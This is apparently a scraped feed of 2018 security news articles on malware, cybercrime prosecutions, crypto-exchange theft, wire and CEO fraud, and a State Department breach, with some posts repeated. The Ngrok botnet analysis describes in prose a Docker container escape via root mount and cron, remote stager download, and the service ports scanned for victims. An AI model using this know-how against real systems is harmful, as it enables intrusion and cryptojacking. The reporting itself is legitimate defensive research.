The malware uses the infected machine’s Microsoft Outlook to implements the spam botnet capability and spread to the user’s contact list. Virobot will send to the victim’s contacts a copy of itself or a malicious file downloaded from its C&C server.

The Virobot malware is able to encrypt files after the successful connection with the C&C server, but at the time of writing the Command and Control infrastructure was taken down.

“Individuals and enterprises should use a multi-layered approach to mitigate the risks brought by threats like ransomware,” concludes Trend Micro.

Pierluigi Paganini

(Security Affairs – Virobot, malware)

The post New Virobot malware combines ransomware and botnet capabilities appeared first on Security Affairs.

Thousands of stolen frequent flyer miles of top airlines sold on Dark Web

By Waqas

Dark Web has become a business hub for malicious hackers and cybercriminals. It seems like there is nothing that is spared from the prying eyes of cybercriminals and the Dark Web has become a thriving ground for all types of illegally acquired data and criminals activities. However, this time around researchers from CompariTech haven’t identified […]

This is a post from HackRead.com Read the original post: Thousands of stolen frequent flyer miles of top airlines sold on Dark Web

Hacker gets 14 years jail time for operating Scan4You malware scanning service

By Waqas

Scan4You was a VirusTotal like platform used for malicious purposes. A 37-year old male from Riga, Latvia has received 14 years sentence for creating and running Scan4You, a counter antivirus service that aided malware developers to check detection rates of their malicious software. The convict has been identified as a Latvian non-citizen namely Ruslan Bondars […]

This is a post from HackRead.com Read the original post: Hacker gets 14 years jail time for operating Scan4You malware scanning service

Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison

The Latvian expert Ruslans Bondars (37), who developed and run the counter antivirus service Scan4You has been sentenced to 14 years in prison.

Bondars was convicted of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“A Latvian “non-citizen,” meaning a citizen of the former USSR who resided in Riga, Latvia, was sentenced to 168 months in prison today for offenses related to his operation of “Scan4you,” an online counter antivirus service that helped computer hackers determine whether the computer viruses and other malicious software they created would be detected by antivirus software, announced Assistant Attorney General Brian A. ” reads the press release published by DoJ.

Scan4you is a VirusTotal like online multi-engine antivirus scanning service that could be used by vxers to test evasion abilities of their malware against the major antiviruses.

Unlike VirusTotal, Scan4you offered a totally anonymous service to its users, this means that data related to the scans of uploaded files were not shared with the antivirus firms.

scan4you

Bondars is one of the two hackers found to have been running Scan4you from 2009 to 2016, its service was very popular in the cybercrime community and was used by malware developers to test their malicious codes.

Ruslans Bondars pleaded guilty on May 16 in federal court in Alexandria, according to a co-conspirator the man had helped Russian law enforcement.

The other hacker who operated the Scan4you service, Jurijs Martisevs, was arrested while on a trip to Latvia and extradited to the United States. The man pleaded guilty to the same Bondars’s charges in March 2018.

Scan4you service allows its customers to develop malicious codes that were used to steal millions of payment cards from retail stores across the world, it has been estimated that overall losses account for $20.5 billion.

“In issuing the sentence, the court found a loss amount of $20.5 billion.  In addition to the term of imprisonment, U.S. District Judge Liam O’Grady ordered Bondars to serve three years of supervised release.  A decision regarding forfeiture and payment of restitution to victims of the offenses is forthcoming.” continues the press release.

“A Scan4you customer, for example, used the service to test malware that was subsequently used to steal approximately 40 million credit and debit card numbers, as well as approximately 70 million addresses, phone numbers and other pieces of personal identifying information, from retail store locations throughout the United States, causing one retailer approximately $292 million in expenses resulting from the intrusion.”

The DoJ cited the case of Scan4you customer that used the service to test malware that was used to steal approximately 40 million credit and debit card numbers, and other personal information from a US retail store, causing $292 million in losses.

A second customer used Scan4you to contribute to the development of infamous Citadel malware that caused over $500 million in fraud-related losses.

“Ruslans Bondars helped malware developers attack American businesses,” explained Assistant Attorney General Benczkowski.

“The Department of Justice and its law enforcement partners make no distinction between service providers like Scan4You and the hackers they assist: we will hold them accountable for all of the significant harm they cause and work tirelessly to bring them to justice, wherever they may be located.”

Pierluigi Paganini

(Security Affairs – Scan4You, malware)

The post Operator of Scan4You Malware-Scanning sentenced to 14 Years in prison appeared first on Security Affairs.

DanaBot banking Trojan evolves and now targets European countries

Security experts at ESET have recently observed a surge in activity of DanaBot banking Trojan that is now targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.

Security experts at ESET have recently observed a surge in activity of DanaBot banking Trojan that was first spotted earlier this year.

DanaBot is a multi-stage modular banking Trojan written in Delphi, the malware allows operators to add new functionalities by adding new plug-ins.

Below some plug-ins that have been used in previous attacks against Australian banks in May 2018:

  • VNC plug-in – establishes a connection to a victim’s computer and remotely controls it
  • Sniffer plug-in – injects malicious scripts into a victim’s browser, usually while visiting internet banking sites
  • Stealer plug-in – harvests passwords from a wide variety of applications (browsers, FTP clients, VPN clients, chat and email programs, poker programs etc.)
  • TOR plug-in – installs a TOR proxy and enables access to .onion web sites

When it was analyzed by Proofpoint, its experts speculated the threat has been under active development.

The banking Trojan initially targeted Australia and Poland users, then it has expanded in other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.

The campaign targeting Poland is still ongoing and is the largest one, attackers used spam messages to compromise victims leveraging the Brishloader technique, a combination of PowerShell and VBS scripts.

DanaBot banking trojan

Earlier September, a series of smaller campaigns targeted banks in Italy, Germany, and Austria.

“Further to this development, on September 8, 2018, ESET discovered a new DanaBot campaign targeting Ukrainian users.” reads the analysis published by ESET.

“Figure 2 shows a spike in the DanaBot detection rate at the turn of August and again in September 2018, as seen in our telemetry data.”

DanaBot

Expert noticed the attackers have introduced several changes to the DanaBot plug-ins since the previously reported campaigns, for example, the Stealer plug-in was also compiled for 64-bit version since August 25, 2018.

Since the beginning of September 2018, the author of DanaBot also implemented the RDP plug-in based on the open-source project RDPWrap that provides Remote Desktop Protocol connections to Windows machines that normally do not support it.

The malware also implemented the RDP plug-in because the protocol is less likely to be blocked by firewalls, experts also highlighted that the RDPWrap allows several users to use the same machine concurrently. This aspect is very important because the attackers can perform reconnaissance operations while the victim is still using the machine.

DanaBot is a very active threat, its operators continue to improve it while targeting  European countries.

“The new features introduced in these latest campaigns indicate the attackers behind DanaBot continue to make use of the malware’s modular architecture to increase their reach and success rate.” concludes ESET.

Further details, including IoCs are reported in the analysis published by ESET.

Pierluigi Paganini

(Security Affairs – DanaBot, hacking)

The post DanaBot banking Trojan evolves and now targets European countries appeared first on Security Affairs.

Ngrok Mining Botnet

The Ngrok campaign is unique in terms of its overall sophistication for a Docker-based attack vector.

Specifically, it demonstrates a novel, dynamic and robust operational security model and the ability to detect and attack newly deployed and misconfigured infrastructure.

Additionally, the campaign is sophisticated in seeking to detect, analyse and neutralise other competing crypto-mining malware. Its agile process can be flexed to quickly deal with new entrant-attacks and ensure a full share of the victim’s CPU resources for its activities.

Introduction

In my previous post I discussed the initial prototyping of a Docker Honeypot / Sandbox called Whaler. I’ve now been running this for a few months and tracking the number of campaigns with a range of sophistication. The most sophisticated of these was the first attack observed within hours of the initial deployment. I named the campaign Ngrok after the inventive reverse proxy used to hide the C2 infrastructure.

I’ve been following the Monero mining pool address used in the Ngrok campaign and regularly checking for other research references on the internet. The campaign has gone largely unnoticed until a recent blog published by 360totalsecurity which prompted me to finally write-up the analysis. As of today (20 Sept) the campaign is still active.

Note: I’d previously documented this as a presentation which I’ve been using in job interviews – key slides are extracted and covered below.

Summary of observed attacks

Whaler – attack types and analysis

Before getting into the details of the Ngrok campaign, it’s worth summarising the key findings from the first few months of operations and development. Firstly nearly all attacks observed were Crypto-mining attackers. One exception appeared to attempt to stage a meterpreter payload to the server, but I was unable to follow-up in time on this and the attacker did not repeat the attack.

Most attackers seem to rely on discovery and indexing by Shodan as a source for their target list. There’s a clear correlation between the honeypot first appearing on Shodan and an immediate wave of attacks.

The attacks broadly fall into three levels of sophistication:

  • Low Complexity – Simply pulling a pre-baked mining image from Docker Hub and running it with parameterisation for the attackers mining pool / account
  • Medium Complexity – Again using Docker Hub, but creating their own container images, often with misleading names (eg mysql) but essentially containing a fully configured crypto-miner. Several of these were reported and shut down quickly working with the Docker security team. Other malware, such as an IRC botnet, was also observed bundled with the miner software.
  • High Complexity – These attackers either ran their own target scanning operations, or leveraged their botnets to do this work for them. They were therefore able to detect and attack victims much quicker. Some of these attacks used the volume mounting feature of the Docker Daemon to execute a container escape – and therefore could install their payloads on the “host” system – invisible to Docker and any monitoring of running containers.

First Attack

Attack timing for Ngrok campaign

 

The first attack was observed within a few hours of deploying the initial Whaler prototype. The attack was occurring approximately every 2 hours in a continuous cycle – which indicates the attack is automated.

Ngrok
Pcap analysis of Ngrok attack

The user agent string confirms this is likely automated, and the attacker is using an open source lightweight Ruby based docker API client framework from Swipely.

The attacking IP address is consistently hidden behind a VPN service.

Exploit

Whaler “Fingerprint” for Ngrok attack

Whaler was enhanced to provide a “fingerprint” of each attack. This is used to determine how much of the attack data (Docker images, containers, pcap files etc) to retain, based on the probability this attack has already been seen. Automated attacks can drive a large amount of data storage requirements if this isn’t managed carefully!

The attack fingerprint for Ngrok is shown above. Key features are:

  • The attacker uses a public alpine docker image, pre-installed with curl. There is nothing malicious about this publicly available container
  • The container is parameterised to use curl to download and run a staging script from a ngrok reverse proxy address – eg hiding the backend C2 infrastructure
  • Note: The ngrok.io subdomains are rotated through a set of 52 which are replaced every 8 hours
  • Each victim has a unique hash identifier to identify their IP – this is used for reporting back to the C2 on details of the host and infection status
  • The container mounts the root file system of the host and creates a crontab entry to execute the stager script outside of docker – this is a classic docker container escape
  • There is a parameter to identify that the stager for Docker (d) should be downloaded – the attacker has a broader target scope including other misconfigured products as discussed later

Stage1 – Loader

The loader script, once running on the host system (outside of Docker) performs the following actions.

  • Enumerate all processes and immediately kill any that meet a pre-defined kill list (other mining processes)
  • Install the miner for the attacker by downloading two further binaries
  • Report back to the C2 server (via ngrok) on the following:
    • Process ID of the infection by this attack
    • Number of CPUs
    • Current Username
    • Process name, binary location and MD5 sum of binary of anything currently running above 20% CPU

The last data point reported here enables the attacker to identify new mining campaigns and adjust their script to also target termination of those processes where found.

During the course of the analysis it was also noted that additional code was added to search for and inject Coinhive mining code into any javascript files found on the server. If these are then served via a web server it would result in further browser-based mining on behalf of the attacker.

Stage 2 – Scanner

Once the installation has been successfully completed and the infection has been reported back to the C2 infrastructure, a second script is delivered using the same mechanism as before (container escape -> cron job).

This second stage is used to enlist the victim to mas-scan a large section of IPv4 space looking for further victims. The script downloads Zmap, Zgrab and JQ and performs a scan of a pre-defined series of 8K blocks of the internet looking for:

  • Redis on port 6379
  • Docker on port 2375
  • Jenkins, Drupal and Modx on ports 80 and 8080
  • CouchDB on 5984
  • Ethereum on 8545

Results are reported back to the C2, and hence the cycle repeats.

Overview of Attacker Infrastructure

Ngrok

An overview of the Ngrok infrastructure is shown above.

Hash Rate & Payment History

Ngrok
Ngrok account hash rate over time

The deployed miner was configured to use the minexmr pool, and the wallet id used is:

4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW

Using this we can see that this account was first used in early April, with approximate hashing capacity of 30-40k/s and there was a significant increase in capacity in early June, peaking at 90k/s. This uplift correlates with  360totalsecurity’s observation that the attacks “started in June” – perhaps indicating an additional target infrastructure that triggered their honeypots.

For reference, benchmarking the miner on a 1 CPU cloud server, the peak mining capacity here would be in the region of 2000 virtual CPUs.

Ngrok 9

Ngrok cumulative profit

The campaign has produced a steady, but relatively low, stream of income. It is possible that other accounts are used – in fact we also have the Coinhive account, which we are unable to determine the hashing rate or any payment details.

Between April and late August the attackers had made approx £5000 GBP.

Further details includig IoC are available at the following URL:

Ngrok Mining Botnet

About the author: oncyberblog.wordpress.com staff

Pierluigi Paganini

(Security Affairs – Ngrok, malware)

The post Ngrok Mining Botnet appeared first on Security Affairs.

Security Affairs: Ngrok Mining Botnet

The Ngrok campaign is unique in terms of its overall sophistication for a Docker-based attack vector.

Specifically, it demonstrates a novel, dynamic and robust operational security model and the ability to detect and attack newly deployed and misconfigured infrastructure.

Additionally, the campaign is sophisticated in seeking to detect, analyse and neutralise other competing crypto-mining malware. Its agile process can be flexed to quickly deal with new entrant-attacks and ensure a full share of the victim’s CPU resources for its activities.

Introduction

In my previous post I discussed the initial prototyping of a Docker Honeypot / Sandbox called Whaler. I’ve now been running this for a few months and tracking the number of campaigns with a range of sophistication. The most sophisticated of these was the first attack observed within hours of the initial deployment. I named the campaign Ngrok after the inventive reverse proxy used to hide the C2 infrastructure.

I’ve been following the Monero mining pool address used in the Ngrok campaign and regularly checking for other research references on the internet. The campaign has gone largely unnoticed until a recent blog published by 360totalsecurity which prompted me to finally write-up the analysis. As of today (20 Sept) the campaign is still active.

Note: I’d previously documented this as a presentation which I’ve been using in job interviews – key slides are extracted and covered below.

Summary of observed attacks

Whaler – attack types and analysis

Before getting into the details of the Ngrok campaign, it’s worth summarising the key findings from the first few months of operations and development. Firstly nearly all attacks observed were Crypto-mining attackers. One exception appeared to attempt to stage a meterpreter payload to the server, but I was unable to follow-up in time on this and the attacker did not repeat the attack.

Most attackers seem to rely on discovery and indexing by Shodan as a source for their target list. There’s a clear correlation between the honeypot first appearing on Shodan and an immediate wave of attacks.

The attacks broadly fall into three levels of sophistication:

  • Low Complexity – Simply pulling a pre-baked mining image from Docker Hub and running it with parameterisation for the attackers mining pool / account
  • Medium Complexity – Again using Docker Hub, but creating their own container images, often with misleading names (eg mysql) but essentially containing a fully configured crypto-miner. Several of these were reported and shut down quickly working with the Docker security team. Other malware, such as an IRC botnet, was also observed bundled with the miner software.
  • High Complexity – These attackers either ran their own target scanning operations, or leveraged their botnets to do this work for them. They were therefore able to detect and attack victims much quicker. Some of these attacks used the volume mounting feature of the Docker Daemon to execute a container escape – and therefore could install their payloads on the “host” system – invisible to Docker and any monitoring of running containers.

First Attack

Attack timing for Ngrok campaign

 

The first attack was observed within a few hours of deploying the initial Whaler prototype. The attack was occurring approximately every 2 hours in a continuous cycle – which indicates the attack is automated.

Ngrok
Pcap analysis of Ngrok attack

The user agent string confirms this is likely automated, and the attacker is using an open source lightweight Ruby based docker API client framework from Swipely.

The attacking IP address is consistently hidden behind a VPN service.

Exploit

Whaler “Fingerprint” for Ngrok attack

Whaler was enhanced to provide a “fingerprint” of each attack. This is used to determine how much of the attack data (Docker images, containers, pcap files etc) to retain, based on the probability this attack has already been seen. Automated attacks can drive a large amount of data storage requirements if this isn’t managed carefully!

The attack fingerprint for Ngrok is shown above. Key features are:

  • The attacker uses a public alpine docker image, pre-installed with curl. There is nothing malicious about this publicly available container
  • The container is parameterised to use curl to download and run a staging script from a ngrok reverse proxy address – eg hiding the backend C2 infrastructure
  • Note: The ngrok.io subdomains are rotated through a set of 52 which are replaced every 8 hours
  • Each victim has a unique hash identifier to identify their IP – this is used for reporting back to the C2 on details of the host and infection status
  • The container mounts the root file system of the host and creates a crontab entry to execute the stager script outside of docker – this is a classic docker container escape
  • There is a parameter to identify that the stager for Docker (d) should be downloaded – the attacker has a broader target scope including other misconfigured products as discussed later

Stage1 – Loader

The loader script, once running on the host system (outside of Docker) performs the following actions.

  • Enumerate all processes and immediately kill any that meet a pre-defined kill list (other mining processes)
  • Install the miner for the attacker by downloading two further binaries
  • Report back to the C2 server (via ngrok) on the following:
    • Process ID of the infection by this attack
    • Number of CPUs
    • Current Username
    • Process name, binary location and MD5 sum of binary of anything currently running above 20% CPU

The last data point reported here enables the attacker to identify new mining campaigns and adjust their script to also target termination of those processes where found.

During the course of the analysis it was also noted that additional code was added to search for and inject Coinhive mining code into any javascript files found on the server. If these are then served via a web server it would result in further browser-based mining on behalf of the attacker.

Stage 2 – Scanner

Once the installation has been successfully completed and the infection has been reported back to the C2 infrastructure, a second script is delivered using the same mechanism as before (container escape -> cron job).

This second stage is used to enlist the victim to mas-scan a large section of IPv4 space looking for further victims. The script downloads Zmap, Zgrab and JQ and performs a scan of a pre-defined series of 8K blocks of the internet looking for:

  • Redis on port 6379
  • Docker on port 2375
  • Jenkins, Drupal and Modx on ports 80 and 8080
  • CouchDB on 5984
  • Ethereum on 8545

Results are reported back to the C2, and hence the cycle repeats.

Overview of Attacker Infrastructure

Ngrok

An overview of the Ngrok infrastructure is shown above.

Hash Rate & Payment History

Ngrok
Ngrok account hash rate over time

The deployed miner was configured to use the minexmr pool, and the wallet id used is:

4AuKPF4vUMcZZywWdrixuAZxaRFt9FPNgcv9v8vBnCtcPkHPxuGqacfPrLeAQWKZpNGTJzxKuKgTCa6LghSCDrEyJ5s7dnW

Using this we can see that this account was first used in early April, with approximate hashing capacity of 30-40k/s and there was a significant increase in capacity in early June, peaking at 90k/s. This uplift correlates with  360totalsecurity’s observation that the attacks “started in June” – perhaps indicating an additional target infrastructure that triggered their honeypots.

For reference, benchmarking the miner on a 1 CPU cloud server, the peak mining capacity here would be in the region of 2000 virtual CPUs.

Ngrok 9

Ngrok cumulative profit

The campaign has produced a steady, but relatively low, stream of income. It is possible that other accounts are used – in fact we also have the Coinhive account, which we are unable to determine the hashing rate or any payment details.

Between April and late August the attackers had made approx £5000 GBP.

Further details includig IoC are available at the following URL:

Ngrok Mining Botnet

About the author: oncyberblog.wordpress.com staff

Pierluigi Paganini

(Security Affairs – Ngrok, malware)

The post Ngrok Mining Botnet appeared first on Security Affairs.



Security Affairs

Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

By Waqas

Zaif is the 35th largest cryptocurrency exchange by turnover. Hackers have stolen a whopping $60 million (6.7 billion yen) worth of cryptocurrency from Zaif, the 35th largest cryptocurrency exchange dealing in Bitcoin, Bitcoin Cash, and Monacoin. The exchange is owned by Tech Bureau, Corp. based in Nishi-Ku, Osaka, Japan. The hack attack took place on September 14th after hackers gained […]

This is a post from HackRead.com Read the original post: Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

Homebuyers Being Targeted by Money Transfer Scam

Money Transfer Scam – Scammers hack the victims’s email accounts, monitor conversations between the buyers and title agents, send instructions on where to wire the money.

A new homebuyer moves through a period of vulnerable transition as they invest in their future. This sensitive stage — a confusing flurry of representatives, documentation and planning — represents an attractive target for con artists with ill intentions. Some choose to capitalize on homebuyers’ ignorance.

The con in question is a money transfer scam with all the likeness of a typical transaction. Scammers hack the email accounts of their victims and monitor conversations between the buyers and title agents. Toward the close of the interaction, the scammers will send false instructions on where to wire the money.

After the wrongfully transferred money reaches the criminals behind the money transfer scam, they disappear, thousands of dollars wealthier. The practice is so whisper-quiet and challenging to catch that it’s given the FBI considerable trouble. For all intents and purposes, the scammers appear real.

Bryan O’Meara was hoping to expand his business with the addition of a parking lot for his new restaurant. He intended to wire upward of $1 million to the seller of the property but was unaware that his conversations were under surveillance by scammers. His business partner was equally unaware.

Fortunately for O’Meara, he didn’t follow through with the transaction — a decision that saved him an enormous sum of money. A loss of that caliber might have upended his business, and it’s a risk that many moving forward in real estate transactions should consider.

money transfer scam

Image by Soumil Kumar

FBI Involvement

The Federal Bureau of Investigation has offered the American public advice on how to better safeguard their money from scammers and hackers. After reporting $5 million in loss from Utah residents in 2017, every citizen is encouraged to take preventive measures to protect themselves from scams.

These measures include a frequent change in passwords, using mismatched and uncommon characters to avoid predictability. They also include a final follow-up with your partner or agent to confirm the wiring instructions are correct. Finally, in a worst-case scenario, people should contact their bank for immediate recall.

It’s an unfortunate truth that, even in the event of a recall, the victim loses most of their stolen money. Scammers will often bounce-wire the money through several international accounts at a high pace, blurring the trail that’s left behind in the event their target tries to reverse their transaction.

No security is 100 percent reliable. Even in following all the steps and taking every precaution, scammers and hackers will always innovate new techniques to steal money from their unwitting victims.

Protecting Home Purchases

While the FBI is a helpful resource when combating scammers, homebuyers are encouraged to take additional measures before they purchase their property of interest. For many, changing a password and making a phone call will not be enough. They should also consider the following advice.

In the final stages of communication between an individual and a company, a comparison of early emails and those received later can reveal differences. These differences indicate a scammer has entered the conversation under the guise of a professional. Verification through multiple channels is the safest route.

A scammer will also place a high amount of pressure on a homebuyer to wire their money. Homebuyers in the final stages of transfer are advised to look closely at the information exchanged between them and the vendor to ensure its validity. A lax attitude toward detail can leave a person open to attack.

However, these innocent people don’t have to fall into the same old traps. Everyone should commit themselves to an awareness of common scamming techniques and illegal practices. Before purchasing a home, potential buyers would benefit by educating themselves about the latest scams in circulation by criminals.

Assessing the Danger

According to a 2017 report by the FBI, almost $1 billion was diverted or nearly diverted from real estate transactions — up by a significant margin from the year prior. This enormous sum of money speaks to the severity of the problem and its relevance to homebuyers today.

As they work through the final stages of a real estate transaction, buyers must remain diligent. A lack of interest in the proceedings can spell the difference between money lost and money saved. With a transaction as important as property exchange, anything less than total attention is inviting trouble.

It’s only through awareness and caution that citizens can protect themselves and their loved ones from the dangers of fraudulent activity.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her recent projects, visit her About Me page.

 

 

Pierluigi Paganini

(Security Affairs – Money Transfer Scam, cybercrime)

The post Homebuyers Being Targeted by Money Transfer Scam appeared first on Security Affairs.

CEO fraud: call it what you want, but I call it messing with the quids

A ruse by any other name, invoice redirection scams are a huge and growing business problem. They’re also known as fake boss scams, impersonation fraud, CEO fraud, or business email compromise, and they’ve risen by 58 per cent in the past year. That’s according to Lloyds Bank which estimates that UK SMEs lose £27,000 on average to such scams. The bank says this type of fraud affects up to half a million businesses.

Here’s how it works: criminals write an email supposedly from a company CEO or CFO, and send it to an employee requesting an urgent payment. Then the unwitting worker transfers the cash to an unauthorised account belonging to the criminals.

You know my name

Despite the name ‘CEO fraud’, bosses are rarely at risk from these scams. Barracuda Networks recently analysed 3,000 scam messages from its Sentinel system and found just 2 per cent target CEOs. Their names are more likely to appear on the emails that scammers send to other employees. Most of these messages land in the inboxes of staff in sales, accounts, operations or marketing departments. To avoid email filters, 60 per cent of messages don’t include links.

Criminals’ efforts are relentless: Valimail estimates that there are 6.4 billion fake emails in circulation every day. Help Net Security said this shows the scam isn’t just a social engineering problem. Because email has no built-in authentication mechanism, it’s easy for criminals to spoof senders.

Stop making cents

Fortunately, there are resources to help recognise these scams and prevent them from working. This month’s SANS Ouch! Newsletter includes tips on spotting and stopping BEC fraud. Lloyds released an awareness video to go with its survey as part of an awareness raising campaign with Get Safe Online. The short film portrays lookalike CEOs, showing how easy it is to appear to be someone else. We’ve also blogged about CEO fraud before and how to avoid becoming a victim. For example, making payment processes more rigorous can reduce the chances of the scam working.

To end on a positive note: the crime doesn’t always pay. Irish police raided 15 homes around Ireland in September as part of a major fraud investigation. They had been tracking a gang they believed were laundering €14.6 million in proceeds from scams like invoice redirection. The crackdown shows why it’s important for victims to report these crimes to police. “While your individual experience as a victim of cyber-crime may not lead directly to an arrest it is invaluable to law enforcement as a source of intel,” said BH Consulting CEO Brian Honan.

 

The post CEO fraud: call it what you want, but I call it messing with the quids appeared first on BH Consulting.

Security Affairs: Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange

Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif exchange.

According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.

The stole digital currencies included roughly 2.2 billion yen belonged to Tech Bureau and 4.5 billion belonged to its clients.

The hacked have taked the control of the exchange for a couple of hours on Sept. 14, and illegally transferred coins form the “hot wallet” of the exchange to wallets under their control.

“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” reported the Reuters.

Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.

The Tech Bureau took offline the exchange and sold to Fisco Ltd the majority ownership for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.

“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” continues the Reuters.

This is the second hack suffered by a Japan’s crypto exchange this year, earlier January  Japan-based digital exchange Coincheck was hacked and crooks stole$530 million in digital coins.

Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.

Japan is considered a global leaked in cryptocurrency technologies, the Bitcoin could be used for payment in the country since April 2017 major retailers accept this kind of payments.

Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.

Last year Japan became the first country to regulate cryptocurrency exchanges, they have to register with FSA and required reporting and other responsibilities.

Anyway, the incidents demonstrate that the level of security of exchanges has to be improved.

Pierluigi Paganini

(Security Affairs – Zaif exchange, hacking)

The post Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange appeared first on Security Affairs.



Security Affairs

Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange

Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif exchange.

According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.

The stole digital currencies included roughly 2.2 billion yen belonged to Tech Bureau and 4.5 billion belonged to its clients.

The hacked have taked the control of the exchange for a couple of hours on Sept. 14, and illegally transferred coins form the “hot wallet” of the exchange to wallets under their control.

“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” reported the Reuters.

Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.

The Tech Bureau took offline the exchange and sold to Fisco Ltd the majority ownership for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.

“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” continues the Reuters.

This is the second hack suffered by a Japan’s crypto exchange this year, earlier January  Japan-based digital exchange Coincheck was hacked and crooks stole$530 million in digital coins.

Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.

Japan is considered a global leaked in cryptocurrency technologies, the Bitcoin could be used for payment in the country since April 2017 major retailers accept this kind of payments.

Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.

Last year Japan became the first country to regulate cryptocurrency exchanges, they have to register with FSA and required reporting and other responsibilities.

Anyway, the incidents demonstrate that the level of security of exchanges has to be improved.

Pierluigi Paganini

(Security Affairs – Zaif exchange, hacking)

The post Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange appeared first on Security Affairs.

Hackers behind Mirai botnet to avoid jail for working with the FBI

By Waqas

Mirai has been known as one of the most powerful botnets comprised of millions of hacked Internet of Things (IoT) devices including routers, digital video recorders (DVRs) and security cameras. Mirai was also used by hackers to carry out one of the largest DDoS attacks on the servers of DynDNS which ultimately disrupted high profile websites like […]

This is a post from HackRead.com Read the original post: Hackers behind Mirai botnet to avoid jail for working with the FBI

Security Affairs: US State Department confirms data breach to unclassified email system

The US State Department confirmed that hackers breached one of its email systems, the attack potentially exposed personal information of some of its employees.

The incident seems to have affected less than 1% of employee inboxes, 600-700 employees out of 69,000 people.

“The Department recently detected activity of concern in its unclassified email system, affecting less than 1 per cent of employee inboxes. Like any large organization with a global presence, we know the Department is a constant target for cyber attacks,”  states the US State Department.

“We have not detected activity of concern in the Department’s classified email system. We determined that certain employees’ personally identifiable information (PII) may have been exposed. We have already notified those employees.”

The security breach affected an unclassified email system at the State Department, the news of the hack came to light after Politico obtained a “Sensitive but Unclassified” notice about the incident.

“This is an ongoing investigation, and we are working with partner agencies, as well as the private sector service provider, to conduct a full assessment.” a State Department spokesperson told Politico.

“We will reach out to any additional impacted employees as needed.”

After the Agency noticed the “suspicious activity” in its email system notified the incident to a number of employees whose personal information may have been compromised.

US State Department didn’t reveal which kind of data had been accessed by attackers, at the time of writing we only know that no classified information had been exposed.

The Agency claimed it took steps to secure its system, and it is offering three years of credit and identity theft monitoring to the affected employees.

A group of senators wrote to Secretary of State Mike Pompeo last week raising concerns that the department did not meet federal standards for cybersecurity and questioning its resilience to cyber attacks.

“Sens. Ron Wyden (D-Ore.), Rand Paul (R-Ky.), Ed Markey (D-Mass.), Jeanne Shaheen (D-N.H.) and Cory Gardner (R-Colo.) asked Pompeo for an update on what the State Department has done to address its “high risk” designation, and how many cyberattacks the department had been subject to abroad in the last three years.”  reported TheHill.

“Pompeo was asked to respond by Oct. 12.”

Pierluigi Paganini

(Security Affairs – US State Department, Data Breach)

The post US State Department confirms data breach to unclassified email system appeared first on Security Affairs.



Security Affairs

US State Department confirms data breach to unclassified email system

The US State Department confirmed that hackers breached one of its email systems, the attack potentially exposed personal information of some of its employees.

The incident seems to have affected less than 1% of employee inboxes, 600-700 employees out of 69,000 people.

“The Department recently detected activity of concern in its unclassified email system, affecting less than 1 per cent of employee inboxes. Like any large organization with a global presence, we know the Department is a constant target for cyber attacks,”  states the US State Department.

“We have not detected activity of concern in the Department’s classified email system. We determined that certain employees’ personally identifiable information (PII) may have been exposed. We have already notified those employees.”

The security breach affected an unclassified email system at the State Department, the news of the hack came to light after Politico obtained a “Sensitive but Unclassified” notice about the incident.

“This is an ongoing investigation, and we are working with partner agencies, as well as the private sector service provider, to conduct a full assessment.” a State Department spokesperson told Politico.

“We will reach out to any additional impacted employees as needed.”

After the Agency noticed the “suspicious activity” in its email system notified the incident to a number of employees whose personal information may have been compromised.

US State Department didn’t reveal which kind of data had been accessed by attackers, at the time of writing we only know that no classified information had been exposed.

The Agency claimed it took steps to secure its system, and it is offering three years of credit and identity theft monitoring to the affected employees.

A group of senators wrote to Secretary of State Mike Pompeo last week raising concerns that the department did not meet federal standards for cybersecurity and questioning its resilience to cyber attacks.

